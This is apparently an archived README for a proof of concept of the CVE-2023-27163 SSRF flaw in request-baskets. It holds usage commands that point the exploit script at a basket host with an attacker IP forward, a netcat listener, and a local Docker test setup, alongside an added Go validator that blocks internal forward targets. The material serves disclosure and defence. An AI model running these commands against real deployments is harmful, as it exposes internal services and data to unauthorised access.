Related vulnerability
Title:
request-baskets code issue vulnerability
(CVE-2023-27163)
Description: request-baskets is an open-source web service by rbaskets. request-baskets v1.2.1 and earlier contain a security vulnerability: a Server-Side Request Forgery (SSRF) flaw in the /api/baskets/{name} component. An attacker can exploit it through crafted API requests to access network resources and sensitive information.
Description
Proof of Concept for Server Side Request Forgery (SSRF) in request-baskets (versions <= 1.2.1)
Introduction
# Proof Of Concept of SSRF on Request-Baskets (CVE-2023-27163)
This repository contains a Proof-of-Concept (PoC) for [CVE-2023-27163](https://nvd.nist.gov/vuln/detail/CVE-2023-27163), a Server-Side Request Forgery (SSRF) vulnerability discovered in [request-baskets](https://github.com/darklynx/request-baskets) up to [version 1.2.1](https://github.com/advisories/GHSA-58g2-vgpg-335q). This vulnerability allows attackers to access network resources and sensitive information by exploiting the /api/baskets/{name} component through a crafted API request.
## Usage
```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>
```
## How does it work?
Request-baskets is a web application built to collect and register requests on a specific route, a so-called basket. When creating a basket, the user can specify another server to which the request is forwarded. The issue is that the user can point this forward at unintended services, such as applications that are only reachable from inside the network.
For example, suppose the server hosts Request-baskets (port 55555) and a Flask web server on port 8000, and Flask is configured to accept connections only from localhost. By creating a basket that forwards to `http://localhost:8000`, the attacker can reach the previously restricted Flask web server.
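The root cause described above is a user-controlled forward URL that is never checked against the set of destinations the service should be allowed to reach. The following Go example (added here; it is not code from request-baskets or from this PoC repository) shows the kind of destination check a forwarding feature needs: it rejects non-HTTP schemes and any host that is a literal or resolves to a loopback, link-local, unspecified or private address. The `ValidateForwardURL` function, the `constructedResolver` stand-in for DNS and the hostnames `internal.example` and `public.example` are all assumptions made for this example.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
)

// isDisallowedIP reports whether ip is a loopback, private (RFC 1918 / ULA),
// link-local or unspecified address: destinations a user-supplied forward
// URL should never be allowed to reach.
func isDisallowedIP(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() || ip.IsUnspecified()
}

// ValidateForwardURL parses a candidate forward URL and rejects schemes other
// than http/https, empty hosts, and hosts that are (or resolve to) disallowed
// addresses. The resolver is injected so the check can run offline in tests;
// in a real service it would wrap net.LookupIP.
func ValidateForwardURL(raw string, resolve func(string) ([]net.IP, error)) error {
	u, err := url.Parse(raw)
	if err != nil {
		return fmt.Errorf("invalid forward URL: %w", err)
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return fmt.Errorf("scheme %q not allowed", u.Scheme)
	}
	host := u.Hostname() // strips the port and IPv6 brackets
	if host == "" {
		return errors.New("forward URL has no host")
	}
	// Literal IP addresses (IPv4 or IPv6, e.g. [::1]) are checked directly.
	if ip := net.ParseIP(host); ip != nil {
		if isDisallowedIP(ip) {
			return fmt.Errorf("forward target %s is not a permitted address", ip)
		}
		return nil
	}
	// Hostnames: every resolved address must be acceptable, not just the first.
	ips, err := resolve(host)
	if err != nil {
		return fmt.Errorf("cannot resolve %q: %w", host, err)
	}
	if len(ips) == 0 {
		return fmt.Errorf("host %q resolved to no addresses", host)
	}
	for _, ip := range ips {
		if isDisallowedIP(ip) {
			return fmt.Errorf("host %q resolves to disallowed address %s", host, ip)
		}
	}
	return nil
}

// constructedResolver is a constructed stand-in for DNS (assumption for this
// example) so that the block runs without network access.
func constructedResolver(host string) ([]net.IP, error) {
	switch host {
	case "localhost":
		return []net.IP{net.ParseIP("127.0.0.1")}, nil
	case "internal.example":
		return []net.IP{net.ParseIP("10.0.0.5")}, nil
	case "public.example":
		return []net.IP{net.ParseIP("203.0.113.10")}, nil
	}
	return nil, fmt.Errorf("no such host")
}

func main() {
	candidates := []string{
		"http://localhost:8000",
		"http://127.0.0.1:8000/",
		"http://[::1]:8000/",
		"http://internal.example/",
		"https://public.example/hook",
		"ftp://public.example/",
	}
	for _, c := range candidates {
		fmt.Printf("%-30s -> %v\n", c, ValidateForwardURL(c, constructedResolver))
	}
}
```

Checking the forward URL once at basket-creation time is necessary but not sufficient: a hostname can resolve to a public address when validated and to an internal one later (DNS rebinding), so a complete fix also applies the same address check at request time, on the address actually dialled, and should additionally reject redirects from the forward target to disallowed addresses.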
## Testing in localhost

1. Start the Docker container of Request-Baskets
```shell
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
```
2. Download the PoC
```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
```
3. Wait for a connection
```shell
nc -lvp 8000
```
4. Save the docker host ip address
```shell
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
```
5. Run the PoC
```shell
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/
```
File snapshot
[4.0K] /data/pocs/bbe58e7427a4e19a4159df69b6a207e130fb6f5f
├── [1.7K] CVE-2023-27163.sh
├── [733K] poc.png
└── [1.9K] README.md
0 directories, 3 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.